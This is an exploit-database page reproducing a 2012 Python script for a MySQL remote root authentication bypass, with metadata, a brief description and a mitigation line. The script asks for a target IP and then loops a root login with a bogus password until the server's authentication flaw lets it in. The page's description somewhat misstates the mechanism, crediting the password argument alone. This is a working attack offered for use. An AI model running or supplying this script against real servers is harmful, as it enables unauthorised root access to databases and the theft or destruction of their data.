header-logo
Suggest Exploit
vendor:
N/A
by:
Dave Kennedy (ReL1K)
7,5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2012

MySQL Remote Root Authentication Bypass

This exploit allows an attacker to bypass authentication and gain root access to a MySQL server. It is done by using the 'mysql' command with the '--password=blah' argument, which allows the attacker to bypass authentication.

Mitigation:

Ensure that all users have strong passwords and that the MySQL server is configured to use secure authentication methods.
Source

Exploit-DB raw data:

#!/usr/bin/python
#
#
# This has to be the easiest "exploit" ever. Seriously. Embarassed to submit this a little.
#
# Title: MySQL Remote Root Authentication Bypass
# Written by: Dave Kennedy (ReL1K)
# http://www.secmaniac.com
#
# Original advisory here: seclists.org/oss-sec/2012/q2/493
import subprocess

ipaddr = raw_input("Enter the IP address of the mysql server: ")

while 1:
	subprocess.Popen("mysql --host=%s -u root mysql --password=blah" % (ipaddr), shell=True).wait()

Navigation

Suggest Exploit

Services By CQR